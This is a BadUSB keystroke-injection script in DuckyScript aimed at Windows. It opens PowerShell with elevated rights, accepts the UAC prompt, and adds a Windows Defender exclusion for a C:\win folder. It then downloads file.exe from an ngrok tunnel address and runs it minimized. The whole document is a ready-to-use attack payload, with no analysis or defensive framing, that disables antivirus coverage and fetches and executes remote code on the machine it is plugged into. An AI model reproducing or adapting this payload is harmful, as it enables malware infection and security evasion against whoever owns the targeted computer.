GUI r
DELAY 1000
STRING powershell 
ENTER
DELAY 1000
STRING Start-Process powershell.exe -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"& {Add-MpPreference -ExclusionPath 'C:\win'; Start-Sleep -Seconds 0;}`"" -Verb RunAs
ENTER
DELAY 1000
ALT y
DELAY 1500
STRING cd / ; mkdir win ; cd win ; echo (wget 'https://longhorn-discrete-flamingo.ngrok-free.app/file.exe' -OutFile file.exe) > b.ps1 ; powershell -ExecutionPolicy ByPass -File b.ps1
ENTER
DELAY 3000
STRING Start-Process -FilePath ".\file.exe" -WindowStyle Minimized ; exit
ENTER
